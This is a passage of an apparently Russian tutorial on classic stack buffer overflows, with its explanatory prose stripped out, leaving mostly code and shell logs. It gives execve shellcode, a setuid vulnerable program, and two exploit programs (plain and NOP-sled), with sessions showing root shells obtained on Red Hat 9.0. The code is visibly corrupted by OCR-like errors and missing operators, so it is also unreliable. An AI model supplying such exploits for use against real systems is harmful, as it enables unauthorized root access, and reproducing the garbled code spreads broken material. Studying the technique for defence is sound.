root- (uid 0). , root, (shell) execve. root, root. , root root.
root , . , .
, . execve. C++ :
int main(){
char *name[2];
name[0] = "/bin/sh";
name[l] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
, :
[jack@0day local]$ gcc shell. - shell
[jack@0day local]$./shell
sh-2.05b#
, , , ? , ? , . . , . .
C++. C++, , :
\xeb\xla\x5e\x31\xcO\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46
\x0c\xb0\x0b\x89\xf\x8d\x4e\x08\x8d\x5\x0c\xcct\x80\xe8\xel
\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\
, . , . , , . I, . ? , . EIP .
, . .
, , . . , Smashing the Stack.
|
|
, , . , , . , , .
. ESP, .
ESP.
unsigned long find_start(void) {
_asm_ ("movl %esp, %")
}
int main(){
printf ("0%\n",find_start())
}
:
int main (int argc.char **argv[]){
char little_array[512];
if (argc > 1)
strcpy(little_array.argv[l])
}
. root- root suid. ( root) , root-.
[jack@0day local]$ sudo chown root victim
[jack@0day local]$ sudo chmod +s victim
, ( Lamagra):
#include <stdlib.h>
#define offset_size 0
#define buffer size 512
char sc[] =
"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long find_start(void) {
_asm__("movl %esp, %eax");
}
int main (int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=offset_size; bsize=buffer_size;
int i;
if (argc > 1) bsize = atoi(argv[l]);
if (argc > 2) offset = atoi(argv[2]);
addr = find_start() offset;
printf("Attempting address. 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize, i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0. i < strlen(sc); i++)
*(ptr++) = sc[i];
buff[bsize - 1] = '\0';
memcpy(buff,"BUF=",4);
putenv(buff);
system("/bin/bash");
}
, - . , , .
[jack@0day local]$ /attack 500
Using address 0xbfffd768
[jack@0day local]$ /victim $BUF
. , (, 512 ).
[jack@0day local]$ /attack 800
Using address 0xbfffe7c8
[jack@0day local]$ /victim $BUF
Segmentation fault (core dumped)
. . :
|
|
[jack@0day local]$./attack 600
Using address 0xbfffea04
[jack@0day local]$ /victim $BUF
sh-2.05# id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
sh-2.05b#
Red Hat 9.0. , .
. , . , . .
NOP
. ? , ? , .
, NOP. NOP (No Operation) , . , . NOP. NOP, NOP . , , , NOP. NOP, NOP-.
, NOP-, . IA32 NOP 0x90 ( , NOP).
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90
char shellcode[] =
"\xeb\xla\x5e\x31\xc0\x88\x46\x07\x8d\xle\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long get_sp(void) {
_asm__("movl %esp, %eax");
}
void main (int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET; bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[l]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory \n");
exit(0);
}
addr = get_sp() offset;
printf("Using address. 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize, i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"BUF=",4);
putenv(buff);
system("/bin/bash");
}
, .
[jack@0day local]$ /nopattack 600
Using address. 0xbfffdd68
[jack@0day local]$ /victim $BUF
sh-2.05# id
uid=0(root) gid=0(root) groups=0(root).10(wheel)
sh-2 05b#
, , . :
[jack@0day local]$ /nopattack 590
Using address; 0xbffff368
[jack@0day local]$./victim $BUF
sh-2.05# id
uid=0(root) gid=0(root) groups=0(root).10(wheel)
sh-2.05b#
NOP-, . ?
|
|
[jack@0day local]$ /nopattack 585
Using address 0xbffffld8
[jack@0day local]$ /victim $BUF
sh-2 05# id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
sh-2.05b#
, NOP- 15-25 .